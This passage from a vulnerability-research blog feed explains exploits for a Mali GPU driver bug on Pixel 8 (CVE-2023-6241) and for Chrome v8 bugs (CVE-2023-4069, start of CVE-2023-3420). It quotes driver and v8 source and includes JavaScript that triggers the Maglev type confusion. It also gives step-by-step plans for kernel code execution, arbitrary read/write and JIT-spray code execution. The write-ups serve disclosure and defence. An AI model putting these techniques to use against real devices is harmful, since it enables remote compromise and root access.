This means that, if I trigger another GPU fault in the JIT region that was affected by the bug, then some new mappings will be added after the region that is not mapped.

This creates a gap in the GPU mappings, and I’m starting to get something that looks exploitable.

Note that since delta has to be non-zero to trigger the bug, and delta + old_size pages at the start of the region are mapped, it is still not possible to have the start of the region unmapped as in the case of GHSL-2023-005. So, my only option here is to shrink the region and have the resulting size lie somewhere inside the unmapped gap.

The only way to shrink a JIT region is to use the BASE_KCPU_COMMAND_TYPE_JIT_FREE GPU command to “free” the JIT region. As explained before, this does not actually free the kbase_va_region itself, but rather puts it in a memory pool so that it may be reused on subsequent JIT allocation. Prior to this, kbase_jit_free will also shrink the JIT region according to the initial_commit size of the region, as well as the trim_level that is configured in the kbase_context:


void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
  old_pages = kbase_reg_current_backed_size(reg);
  if (reg->initial_commit < old_pages) {
    u64 new_size = MAX(reg->initial_commit,
      div_u64(old_pages * (100 - kctx->trim_level), 100));
    u64 delta = old_pages - new_size;
    if (delta) {
      mutex_lock(&kctx->reg_lock);
      kbase_mem_shrink(kctx, reg, old_pages - delta);
      mutex_unlock(&kctx->reg_lock);
    }
  }
  ...
}
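The trim arithmetic can be checked with a plain C sketch (jit_trim_size is a hypothetical helper; MAX and div_u64 are replaced with ordinary C). It returns the number of backing pages the region keeps after kbase_jit_free shrinks it:

```c
#include <assert.h>

/* Shrink to the larger of initial_commit and
 * old_pages * (100 - trim_level) / 100 pages. */
static unsigned long long jit_trim_size(unsigned long long initial_commit,
                                        unsigned long long old_pages,
                                        unsigned int trim_level) {
  unsigned long long new_size = old_pages * (100ULL - trim_level) / 100;
  return new_size < initial_commit ? initial_commit : new_size;
}
```

With trim_level = 100 the region is trimmed all the way back to its initial commit size, which is what gives control over final_size.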

Either way, I can control the size of this shrinking. With this in mind, I can arrange the region in the following way:

  1. Create a JIT region and trigger the bug. Arrange the GPU fault so that the fault handler adds fault_size pages, enough pages to cover at least one level 2 PTE.

    After the bug is triggered, only the initial old_size + delta pages are mapped to the GPU address space, while the kbase_va_region has old_size + delta + fault_size backing pages in total.

  2. Trigger a second fault at an offset greater than the number of backing pages, so that pages are appended to the region and mapped after the unmapped regions created in the previous step.

  3. Free the JIT region using BASE_KCPU_COMMAND_TYPE_JIT_FREE, which will call kbase_jit_free to shrink the region and remove pages from it. Control the size of this trimming so that the size of the backing store after shrinking (final_size) lies somewhere within the unmapped region covered by the first level 2 PTE.

When the region is shrunk, kbase_mmu_teardown_pgd_pages is called to unmap the GPU address mappings, starting from region_start + final_size all the way up to the end of the region. As the entire address range covered by the first level 2 PTE is unmapped, when kbase_mmu_teardown_pgd_pages tries to unmap region_start + final_size, the condition !mmu_mode->pte_is_valid is met at a level 2 PTE and so the unmapping will skip the next 512 pages, starting from region_start + final_size. However, since addresses belonging to the next level 2 PTE are still mapped, these addresses will be skipped incorrectly (the orange region in the next figure), leaving them mapped to pages that are going to be freed:

Once the shrinking is completed, the backing pages are freed and the addresses in the orange region will retain access to already freed pages.
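The skipping behavior and its consequence can be modeled in a few lines. This is a hypothetical simulation, not driver code: l2_valid marks which level 2 PTEs are valid, mapped marks which pages are currently mapped, and the return value counts mapped pages that the walk incorrectly leaves behind (zero means the teardown was safe):

```c
#include <assert.h>
#include <stddef.h>

#define L2_RANGE 512  /* pages covered by one level 2 PTE */

/* Walks [start, start + nr); an invalid level 2 PTE makes it skip 512
 * pages from the current (possibly unaligned) position, which can
 * overshoot into the next, still-mapped level 2 range. */
static size_t teardown_skipped(const int *l2_valid, int *mapped,
                               size_t start, size_t nr) {
  size_t skipped = 0, vpfn = start;
  while (nr) {
    size_t count;
    if (!l2_valid[vpfn / L2_RANGE]) {
      count = L2_RANGE;                 /* skip a whole level 2 range */
      if (count > nr)
        count = nr;
      for (size_t i = 0; i < count; i++)
        skipped += mapped[vpfn + i];    /* mapped pages left behind */
    } else {
      count = 1;
      mapped[vpfn] = 0;                 /* unmap one page */
    }
    vpfn += count;
    nr -= count;
  }
  return skipped;
}
```

With the first 512-page range fully unmapped and the next range partially mapped, a teardown starting at final_size = 100 skips pages 100 to 611, incorrectly retaining the 100 mapped pages at 512 to 611.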

This means that the freed backing page can now be reused as any kernel page, which gives me plenty of options to exploit this bug. One possibility is to use my previous technique to have the backing page reused as a page table global directory (PGD) of our GPU kbase_context.

To recap, let’s take a look at how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:


int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
    struct tagged_addr *pages, bool partial_allowed)
{
    ...
  /* Get pages from this pool */
  while (nr_from_pool--) {
    p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
  }

  if (i != nr_4k_pages && pool->next_pool) {
    /* Allocate via next pool */
    err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
        nr_4k_pages - i, pages + i, partial_allowed);
        ...
  } else {
    /* Get any remaining pages from kernel */
    while (i != nr_4k_pages) {
      p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
  }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1. in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2. in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, provided that the memory region is not evicted, the same happens in the opposite direction: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context. If that pool is full, it'll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.
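The tiered allocation can be sketched as follows (toy_pool and toy_alloc_pages are hypothetical, and the pool sizes in the example are made up). The return value is the number of pages that fall through both pool tiers to the kernel's buddy allocator:

```c
#include <assert.h>
#include <stddef.h>

struct toy_pool { size_t avail; struct toy_pool *next; };

/* Take from this pool first, then the next tier; whatever is left
 * would come straight from the kernel. */
static size_t toy_alloc_pages(struct toy_pool *pool, size_t want) {
  size_t from_pool = want < pool->avail ? want : pool->avail;
  pool->avail -= from_pool;
  want -= from_pool;
  if (want && pool->next)
    return toy_alloc_pages(pool->next, want);
  return want;  /* remainder allocated from the buddy allocator */
}
```

Freeing runs the same tiers in reverse, which is what lets a page freed by one kbase_context land in the shared next_pool and be handed out again, including as a PGD.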

As noted in my post Corrupting memory without memory corruption, pool->next_pool is a memory pool managed by the Mali driver and shared by all kbase_context objects. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found here.)

Once the freed page is reused as a PGD of a GPU context, the GPU addresses that retain access to the freed page can be used to rewrite the PGD from the GPU. This allows any kernel memory, including kernel code, to be mapped to the GPU, so I can rewrite kernel code and hence execute arbitrary kernel code. It also allows me to read and write arbitrary kernel data, so I can easily rewrite the credentials of my process to gain root, as well as disable SELinux.

The exploit for Pixel 8 can be found here with some setup notes.

How does this bypass MTE?

So far, I’ve not mentioned any specific measures to bypass MTE. In fact, MTE does not affect the exploit flow of this bug at all. While MTE protects against dereferences of pointers to inconsistent memory blocks, the exploit does not rely on any such dereferencing. When the bug is triggered, it creates inconsistencies between the pages array and the GPU mappings of the JIT region. At this point, there is no memory corruption, and neither the GPU mappings nor the pages array, when considered separately, contains invalid entries. When the bug is used to cause kbase_mmu_teardown_pgd_pages to skip removing GPU mappings, its effect is to cause physical addresses of freed memory pages to be retained in the GPU page table. So, when the GPU accesses the freed pages, it is in fact accessing their physical addresses directly, which does not involve any pointer dereferencing either. On top of that, I’m also not sure whether MTE has any effect on GPU memory accesses anyway. So, by using the GPU to access physical addresses directly, I’m able to completely bypass the protection that MTE offers. Ultimately, the code that manages memory accesses cannot itself be fully memory safe: at some point, physical addresses have to be used directly to access memory.

Conclusion

In this post, I’ve shown how CVE-2023-6241 can be used to gain arbitrary kernel code execution on a Pixel 8 with kernel MTE enabled. While MTE is arguably one of the most significant advances in mitigations against memory corruption and will render many memory corruption vulnerabilities unexploitable, it is not a silver bullet, and it is still possible to gain arbitrary kernel code execution with a single bug. The bug in this post bypasses MTE by using a coprocessor (GPU) to access physical memory directly (Case 4 in MTE As Implemented, Part 3: The Kernel). With more and more hardware and software mitigations implemented on the CPU side, I expect coprocessors and their kernel drivers to continue to be a powerful attack surface.

The post Gaining kernel code execution on an MTE-enabled Pixel 8 appeared first on The GitHub Blog.

Getting RCE in Chrome with incomplete object initialization in the Maglev compiler https://github.blog/security/vulnerability-research/getting-rce-in-chrome-with-incomplete-object-initialization-in-the-maglev-compiler/ Tue, 17 Oct 2023 15:00:55 +0000 https://github.blog/?p=74790 In this post, I'll exploit CVE-2023-4069, a type confusion in Chrome that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

In this post I’ll exploit CVE-2023-4069, a type confusion vulnerability that I reported in July 2023. The vulnerability—which allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site—is found in v8, the Javascript engine of Chrome. It was filed as bug 1465326 and subsequently fixed in version 115.0.5790.170/.171.

Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromises the victim’s device when they visit a malicious website. What’s more, renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. That being said, the renderer process has limited privilege and such a vulnerability needs to be chained with a second “sandbox escape” vulnerability (either another vulnerability in the Chrome browser process or one in the operating system) to compromise Chrome itself or the device.

While many of the most powerful and sophisticated “one-click” attacks are highly targeted, and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly.

The current vulnerability, CVE-2023-4069, exists in the Maglev compiler, a new mid-tier JIT compiler in Chrome that optimizes Javascript functions based on previous knowledge of the input types. This kind of optimization is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers.

Maglev compiler

The Maglev compiler is a mid-tier JIT compiler used by v8. Compared to the top-tier JIT compiler, TurboFan, Maglev generates less optimized code but with a faster compilation speed. Having multiple JIT compilers is common in Javascript engines, the idea being that with multiple tier compilers, you’ll find a more optimal tradeoff between compilation time and runtime optimization.

Generally speaking, when a function is first run, slow bytecode is generated; as the function runs more often, it may get compiled into more optimized code, first by the lowest-tier JIT compiler. If the function is used even more often, its optimization tier moves up, resulting in better runtime performance at the expense of a longer compilation time. The idea here is that for code that runs often, the runtime cost will likely outweigh the compile time cost. You can consult An Introduction to Speculative Optimization in v8 by Benedikt Meurer for more details of how the compilation process works.

The Maglev compiler is enabled by default starting from version 114 of Chrome. Similar to TurboFan, it goes through the bytecode of a Javascript function, taking into account the feedback that was collected from previous runs, and transforms the bytecode into more optimized code. However, unlike TurboFan, which first transforms bytecodes into a “Sea of Nodes”, Maglev uses an intermediate representation and first transforms bytecodes into SSA (Static Single-Assignment) nodes, which are declared in the file maglev-ir.h. At the time of writing, the compilation process of Maglev consists mainly of two phases of optimizations: the first phase involves building a graph from the SSA nodes, while the second phase consists of optimizing the representations of Phi values.

Object construction in v8

The bug in this post really has more to do with object construction than with Maglev, so I'll now go through some concepts of how v8 handles Javascript construction. A Javascript function can be used as a constructor and called with the new keyword. When it is called with new, the new.target variable is available in the function scope and specifies the function on which new was invoked. In the following case, new.target is the same as the function itself.

function foo() {
  %DebugPrint(new.target);
}
new foo();  // foo
foo();      // undefined

This, however, is not always the case, and new.target may be different from the function itself. For example, in the case of construction via a derived constructor:


class A {
  constructor() {
    %DebugPrint(new.target);
  }
}

class B extends A {
}

new A();  // A
new B();  // B

Another way to have a different new.target is to use the Reflect.construct built-in function:


Reflect.construct(A, [], B);  // B

The signature of Reflect.construct is as follows, which specifies newTarget as the new.target:


Reflect.construct(target, argumentsList, newTarget)

The Reflect.construct method sheds some light on the role of new.target in object construction. According to the documentation, target is the constructor that is actually executed to create and initialize an object, while newTarget provides the prototype for the created object. For example, the following creates a Function type object and only Function is called.


var x = Reflect.construct(Function, [], Array);
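The effect is observable from plain Javascript: the object is created by Function (so it is callable), but its prototype comes from Array:

```javascript
// target = Function is the constructor that runs and creates the object;
// newTarget = Array only supplies the prototype of the result.
const x = Reflect.construct(Function, [], Array);

const isCallable = typeof x === 'function';                           // true: created by Function
const protoFromArray = Object.getPrototypeOf(x) === Array.prototype;  // true: prototype from Array
const isRealArray = Array.isArray(x);                                 // false: not an Array exotic object
```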

This is consistent with construction via class inheritance:


class A {}

class B extends A {}

var x = new B();
console.log(x.__proto__ == B.prototype);  //<--- true

In this case, though, the derived constructor B does get called. So what is the object that's actually created? For functions that return a value, or for class constructors, the answer is clearer:


function foo() {return [1,2];}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns [1,2]

but less so otherwise:


function foo() {}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns object {}, instead of undefined

So even if a function does not return an object, using it as target in Reflect.construct still creates a Javascript object. Roughly speaking, object construction follows these steps (see, for example, Generate_JSConstructStubGeneric):

First a default receiver (the this object) is created using FastNewObject, and then the target function is invoked. If the target function returns an object, then the default receiver is discarded and the return value of target is used as the returned object instead; otherwise, the default receiver is returned.
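These steps can be sketched in plain Javascript (the function names here are my own, not V8's):

```javascript
// Rough JS model of the construct stub: build a default receiver from
// new.target's prototype, run target, and keep target's return value only
// if it is an object.
function fastNewObject(target, newTarget) {
  return Object.create(newTarget.prototype); // default receiver
}

function constructSketch(target, args, newTarget) {
  const receiver = fastNewObject(target, newTarget);
  const result = target.apply(receiver, args);
  // If target returned an object, the default receiver is discarded.
  return (typeof result === 'object' && result !== null) ? result : receiver;
}

function foo() { return [1, 2]; }
function bar() {}

constructSketch(foo, [], bar); // [1, 2]: foo's return value wins
constructSketch(bar, [], foo); // {}: default receiver, prototype = foo.prototype
```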

Default receiver object

The default receiver object created by FastNewObject is relevant to this bug, so I’ll explain it in a bit more detail. Most Javascript functions contain an internal field, initial_map. This is a Map object that determines the type and the memory layout of the default receiver object created by this function. In v8, Map determines the hidden type of an object, in particular, its memory layout and the storage of its fields. Readers can consult “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens to get a high-level understanding of object types and maps.

When creating the default receiver object, FastNewObject will try to use the initial_map of new.target (new_target) as the Map for the default receiver:


TNode<JSObject> ConstructorBuiltinsAssembler::FastNewObject(
    TNode<Context> context, TNode<JSFunction> target,
    TNode<JSReceiver> new_target, Label* call_runtime) {
  // Verify that the new target is a JSFunction.
  Label end(this);
  TNode<JSFunction> new_target_func =
      HeapObjectToJSFunctionWithPrototypeSlot(new_target, call_runtime);
  ...
  GotoIf(DoesntHaveInstanceType(CAST(initial_map_or_proto), MAP_TYPE),
         call_runtime);
  TNode<Map> initial_map = CAST(initial_map_or_proto);
  TNode<Object> new_target_constructor = LoadObjectField(
      initial_map, Map::kConstructorOrBackPointerOrNativeContextOffset);
  GotoIf(TaggedNotEqual(target, new_target_constructor), call_runtime);  //<--- check
  ...

  BIND(&instantiate_map);
  return AllocateJSObjectFromMap(initial_map, properties.value(), base::nullopt,
                                 AllocationFlag::kNone, kWithSlackTracking);
}

This is curious, as the default receiver should have been created using target, and new_target should only be used to set its prototype. The reason is an optimization that caches both the initial_map of target and the prototype of new_target in the initial_map of new_target, which I'll explain now.

In the above, FastNewObject has a check (marked as “check” in the above snippet) to make sure that target is the same as the constructor field of the initial_map. For most functions, the initial_map either has not been created yet (it is created lazily), or its constructor field points to the function itself (new_target in this case). So when new_target is first used to construct an object with a different target, the call_runtime slow path is likely taken, which uses JSObject::New:


MaybeHandle<JSObject> JSObject::New(Handle<JSFunction> constructor,
                                    Handle<JSReceiver> new_target,
                                    Handle<AllocationSite> site) {
  ...
  Handle<Map> initial_map;
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, initial_map,
      JSFunction::GetDerivedMap(isolate, constructor, new_target), JSObject);
  ...
  Handle<JSObject> result = isolate->factory()->NewFastOrSlowJSObjectFromMap(
      initial_map, initial_capacity, AllocationType::kYoung, site);
  return result;
}

This function calls GetDerivedMap, which may call FastInitializeDerivedMap to create an initial_map in the new_target:


bool FastInitializeDerivedMap(Isolate* isolate, Handle<JSFunction> new_target,
                              Handle<JSFunction> constructor,
                              Handle<Map> constructor_initial_map) {
  ...
  Handle<Map> map =
      Map::CopyInitialMap(isolate, constructor_initial_map, instance_size,
                          in_object_properties, unused_property_fields);
  map->set_new_target_is_base(false);
  Handle<HeapObject> prototype(new_target->instance_prototype(), isolate);
  // Also sets map.prototype to prototype and map.constructor to constructor
  JSFunction::SetInitialMap(isolate, new_target, map, prototype, constructor);
  ...

The initial_map created here is a copy of the initial_map of target (constructor), but with its prototype set to the prototype of new_target and its constructor set to target. This is the only case when the constructor of an initial_map points to a function other than itself and provides the context for the initial_map of new_target to be used in FastNewObject: if the constructor of an initial_map points to a different function, then the initial_map is a copy of the initial_map of the constructor. Checking that new_target.initial_map.constructor equals target, FastNewObject ensures that the initial_map of new_target is a copy of target.initial_map, but with new_target.prototype as its prototype, which is the correct Map to use.
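The whole caching scheme can be modeled with a short toy sketch in Javascript (all names here are illustrative; V8's real maps are internal objects, not script-visible):

```javascript
// Toy model of the initial_map cache: a map carries a constructor_ back-pointer,
// and new_target caches a copy of target's initial_map with its own prototype.
function getDerivedMap(target, newTarget) {
  const cached = newTarget.cachedInitialMap;
  // FastNewObject's check: the cached map must have been copied from `target`.
  if (cached && cached.constructor_ === target) return cached;
  // Slow path (JSObject::New / FastInitializeDerivedMap): copy target's
  // initial_map, point its prototype at new_target.prototype, and cache it.
  const map = {
    layoutFrom: target,              // memory layout copied from target
    prototype_: newTarget.prototype, // prototype taken from new_target
    constructor_: target,            // back-pointer used by the fast-path check
  };
  newTarget.cachedInitialMap = map;
  return map;
}

function A() {}
function B() {}
function C() {}

const m1 = getDerivedMap(A, B); // slow path: creates and caches a map on B
const m2 = getDerivedMap(A, B); // fast path: cache hit, same map
const m3 = getDerivedMap(C, B); // constructor_ mismatch: a fresh map is made
```

The constructor_ check in the fast path is exactly the check that the Maglev code discussed below fails to perform.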

The vulnerability

Derived classes often have no-op default constructors, which do not modify receiver objects, for example:


class A {}
class B extends A {}
class C extends B {}
const o = new C();

In this case, when calling new C(), the default constructor calls to B and A are no-op and can be omitted. The FindNonDefaultConstructorOrConstruct bytecode is an optimization to omit redundant calls to no-op default constructors in these cases. In essence, it walks up the chain of super constructors and skips the default constructors that can be omitted. If it can skip all the intermediate default constructors and reach the base constructor, then FastNewObject is called to create the default receiver object. The bytecode is introduced in a derived class constructor:


class A {}
class B extends A {}
new B();

Running the above with the print-bytecode flag in d8 (the standalone version of v8), I can see that FindNonDefaultConstructorOrConstruct is inserted in the bytecode of the derived constructor B:


[generated bytecode for function: B (0x1a820019ba41 <SharedFunctionInfo B>)]
Bytecode length: 45
Parameter count 1
Register count 7
Frame size 56
         0x1a820019be6c @    0 : 19 fe f9          Mov <closure>, r1
 1700 S> 0x1a820019be6f @    3 : 5a f9 fa f5       FindNonDefaultConstructorOrConstruct r1, r0, r5-r6
 ...
         0x1a820019be7e @   18 : 99 0c             JumpIfTrue [12] (0x1a820019be8a @ 30)
 ...
         0x1a820019be8a @   30 : 0b 02             Ldar <this>
         0x1a820019be8c @   32 : ad                ThrowSuperAlreadyCalledIfNotHole
         0x1a820019be8d @   33 : 19 f7 02          Mov r3, <this>
 1713 S> 0x1a820019be90 @   36 : 0d 01             LdaSmi [1]
 1720 E> 0x1a820019be92 @   38 : 32 02 00 02       SetNamedProperty <this>, [0], [2]
         0x1a820019be96 @   42 : 0b 02             Ldar <this>
 1727 S> 0x1a820019be98 @   44 : aa                Return

In particular, if FindNonDefaultConstructorOrConstruct succeeds (returns true), then the default receiver object will be returned immediately.

The vulnerability happens in the handling of FindNonDefaultConstructorOrConstruct in Maglev.


void MaglevGraphBuilder::VisitFindNonDefaultConstructorOrConstruct() {
  ...
          compiler::OptionalHeapObjectRef new_target_function =
              TryGetConstant(new_target);
          if (kind == FunctionKind::kDefaultBaseConstructor) {
            ValueNode* object;
            if (new_target_function && new_target_function->IsJSFunction()) {
              object = BuildAllocateFastObject(
                  FastObject(new_target_function->AsJSFunction(), zone(),
                             broker()),
                  AllocationType::kYoung);
  ...

If it manages to skip all the default constructors and reach the base constructor, then it’ll check whether new_target is a constant. If that is the case, then BuildAllocateFastObject, instead of FastNewObject, is used to create the receiver object. The problem is that, unlike FastNewObject, BuildAllocateFastObject uses the initial_map of new_target without checking its constructor field:


ValueNode* MaglevGraphBuilder::BuildAllocateFastObject(
    FastObject object, AllocationType allocation_type) {
  ...
  ValueNode* allocation = ExtendOrReallocateCurrentRawAllocation(
      object.instance_size, allocation_type);
  BuildStoreReceiverMap(allocation, object.map);  // new_target.initial_map
  ...
  return allocation;
}

Why is this bad? As explained before, when constructing an object, target, rather than new_target, is called to initialize the object fields. If new_target is not of the same type as target, then creating an object with the initial_map of new_target can leave fields uninitialized:


class A {}
class B extends A {}
var x = Reflect.construct(B, [], Array);

In this case, new_target is Array, so if the initial_map of new_target is used to create x (receiver), then x is going to be an Array type object, which has a field length that specifies the size of the array and is used for bounds checking. If B, which is the target, is used to initialize the Array object, then length would become uninitialized. This problematic scenario is prevented by checking the constructor of new_target.initial_map to make sure that it is B, and the absence of the check in Maglev results in the vulnerability.

There is one problem here: I need new_target to be a constant to reach this code, but when used with Reflect.construct, new_target is an argument to the function and is never going to be a constant. To overcome this, let’s take a look at what TryGetConstant, which is used in FindNonDefaultConstructorOrConstruct to check that new_target is a constant, does:


compiler::OptionalHeapObjectRef MaglevGraphBuilder::TryGetConstant(
    ValueNode* node, ValueNode** constant_node) {
  if (auto result = TryGetConstant(broker(), local_isolate(), node)) {  //<--- 1.
    if (constant_node) *constant_node = node;
    return result;
  }
  const NodeInfo* info = known_node_aspects().TryGetInfoFor(node);
  if (info && info->is_constant()) {                                    //<--- 2.
    if (constant_node) *constant_node = info->constant_alternative;
    return TryGetConstant(info->constant_alternative);
  }
  return {};
}

When checking whether a node is constant, TryGetConstant first checks if the node is a known global constant (marked as 1. in the above), which will be false in our case. However, it also checks NodeInfo for the node to see if it has been marked as a constant by other nodes (marked as 2. in the above). If the value of the node has been checked against a global constant previously, then its NodeInfo will be set to a constant. If that’s the case, then I can store new.target to a global variable that has not been changed, which will cause Maglev to insert a CheckValue node to ensure that new.target is the same as the global constant:


class A {}

var x = Array;

class B extends A {
  constructor() {
    x = new.target;  //<--- insert CheckValue node to cache new.target as constant (Array)
    super();
  }
}

Reflect.construct(B, [], Array); //<--- Calls `B` as `target` and `Array` as `new_target`

When B is optimized by Maglev and the optimized code is run, Reflect.construct is likely to return an Array with length 0. This is because initially, the free spaces in the heap mostly contain zeroes, so when the created Array uses an uninitialized value as its length, this value is most likely going to be zero. However, once a garbage collection is run, the free spaces in the heap will likely contain some non-trivial values (objects that are freed by garbage collection). By creating some objects in the heap, deleting them, and then triggering a garbage collection, I could carefully arrange the heap to make the uninitialized Array created through the bug take any value as its length. In practice, a rather crude trial-and-error approach (which mostly involves triggering a garbage collection and creating uninitialized Array with the bug until you get it right) is sufficient to give me consistent and reliable results:


//----- Create incorrect Maglev code ------
var x = Array;

class B extends A {
  constructor() {
    x = new.target;
    super();
  }
}
function construct() {
  var r = Reflect.construct(B, [], x);
  return r;
}
//Compile optimized code
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();  // length of corruptedArr is 0, try again...
corruptedArr = construct();  // length of corruptedArr takes the pointer of an object, which gives a large value

While this already allows out-of-bounds (OOB) access to a Javascript array, which is often sufficient to gain code execution, the situation is slightly more complicated in this case.

Gaining code execution

The Array created via the bug has no elements, so its element store is set to the empty_fixed_array. The main problem is that empty_fixed_array is located in a read-only region of the v8 heap, which means that an OOB write needs to be large enough to pass the entire read-only heap or it’ll just crash on access:


DebugPrint: 0x10560004d5e5: [JSArray]
 - map: 0x10560018ed39  [FastProperties]
 - prototype: 0x10560018e799 
 - elements: 0x105600000219  [HOLEY_SMI_ELEMENTS]   //<------- address of empty_fixed_array
 ...

As you can see above, the lower 32 bits of the address of empty_fixed_array is 0x219, which is fairly small. The lower 32 bits of the address is called the compressed address. In v8, most references are only stored as the lower 32 bits of the full 64-bit pointers in the heap, while the higher 32 bits remain constant and are cached in a register. In particular, v8 objects are referenced using the compressed address and this is an optimization called pointer compression.
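As a sketch of the decompression arithmetic (the cage base below is made up for illustration; only the low 32 bits are what the heap actually stores):

```javascript
// Only the low 32 bits of a pointer (the "compressed address") are stored in
// the heap; the high 32 bits (the heap cage base, hypothetical here) stay
// constant and are kept in a register.
const cageBase   = 0x1056_00000000n;  // hypothetical per-process heap base
const compressed = 0x219n;            // compressed address of empty_fixed_array
const fullPtr    = cageBase | compressed;

fullPtr.toString(16);  // '105600000219'
```

Because an OOB index is added to the compressed address, an element store at index i of the corrupted array lands at compressed address 0x219 plus a small header offset plus 8*i, which is why the access must reach past the read-only region before it hits writable heap.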

As explained in Section “Bypassing the need to get an infoleak” of my other post, the addresses of many objects are very much constant in v8 and depend only on the software version. In particular, the address of empty_fixed_array is the same across different runs and software versions, and more importantly, it remains a small address. This means most v8 objects are going to be placed at an address larger than that of the empty_fixed_array. In particular, with a large enough length, it is possible to access any v8 object.

While this bug is exploitable in theory, it is still unclear how I can use it to access and modify a specific object of my choice. Although I can use the uninitialized Array created by the bug to search through all objects that are allocated behind empty_fixed_array, doing so is inefficient and I may end up accessing some invalid objects that could result in a crash. It would be good to at least have an idea of the addresses of the objects that I create in Javascript.

In a talk that I gave at the POC2022 conference last year, I shared how object addresses in v8 can indeed be predicted accurately by simply knowing the version of Chrome. What I didn’t know then was that, even after a garbage collection, object addresses can still be predicted reliably.


//Triggers garbage collection
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();
corruptedArr = construct();

var oobDblArr = [0x41, 0x42, 0x51, 0x52, 1.5];  //<---- address remains consistent across runs

For example, in the above situation, the object oobDblArr created after garbage collection remains in the same address fairly consistently across different runs. While the address can sometimes change slightly, it is sufficient to give me a rough starting point to search for oobDblArr in corruptedArr (the Array created from the bug). With this, I can corrupt the length of oobDblArr to gain an OOB access with oobDblArr. The exploit flow is now very similar to the one described in my previous post, and consists of the following steps:

  1. Place an Object Array, oobObjArr after oobDblArr, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any v8 object.
  2. Place another double array, oobDblArr2 after oobDblArr, and use the OOB write primitive in oobDblArr to overwrite the element field of oobDblArr2 to an object address. Accessing the elements of oobDblArr2 then allows me to read/write to arbitrary addresses.
  3. While this gives me arbitrary read and write primitives within the v8 heap, as well as the address of any object, the recently introduced heap sandbox in v8 keeps the v8 heap fairly isolated, so I still can't access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the RWX pages that are used for storing Web Assembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox.
  4. The idea of JIT spraying is that a pointer to the JIT optimized code of a function is stored in a Javascript Function object. By modifying this pointer with the arbitrary read and write primitives within the v8 heap, I can make it point into the middle of the JIT code. If I use data structures, such as a double array, to store shellcode as floating point numbers in the JIT code, then jumping to these data structures will allow me to execute arbitrary code. I refer readers to this post for more details.

The exploit can be found here with some set up notes.

Conclusion

With different tiers of optimizations in Chrome, the same functionality often needs to be implemented multiple times, each with different and specific optimization considerations. For complex routines that rely on subtle assumptions, this can result in security problems when code is ported between optimization tiers, as we have seen in this case, where the implementation of FindNonDefaultConstructorOrConstruct missed an important check.

The post Getting RCE in Chrome with incomplete object initialization in the Maglev compiler appeared first on The GitHub Blog.

]]> Getting RCE in Chrome with incorrect side effect in the JIT compiler https://github.blog/security/vulnerability-research/getting-rce-in-chrome-with-incorrect-side-effect-in-the-jit-compiler/ Tue, 26 Sep 2023 15:00:54 +0000 https://github.blog/?p=74273 In this post, I'll exploit CVE-2023-3420, a type confusion in Chrome that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

The post Getting RCE in Chrome with incorrect side effect in the JIT compiler appeared first on The GitHub Blog.

]]>
In this post, I’ll explain how to exploit CVE-2023-3420, a type confusion vulnerability in v8 (the Javascript engine of Chrome), that I reported in June 2023 as bug 1452137. The bug was fixed in version 114.0.5735.198/199. It allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromises the victim’s device when they visit a malicious website. A renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. The renderer process has limited privilege though, so the attacker then needs to chain such a vulnerability with a second “sandbox escape” vulnerability: either another vulnerability in the Chrome browser process, or a vulnerability in the operating system to compromise either Chrome itself or the device. For example, a chain consisting of a renderer RCE (CVE-2022-3723), a Chrome sandbox escape (CVE-2022-4135), and a kernel bug (CVE-2022-38181) was discovered to be exploited in-the-wild in “Spyware vendors use 0-days and n-days against popular platforms” by Clement Lecigne of the Google Threat Analysis Group.

While many of the most powerful and sophisticated “one-click” attacks are highly targeted and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly by analyzing patches once these are released.

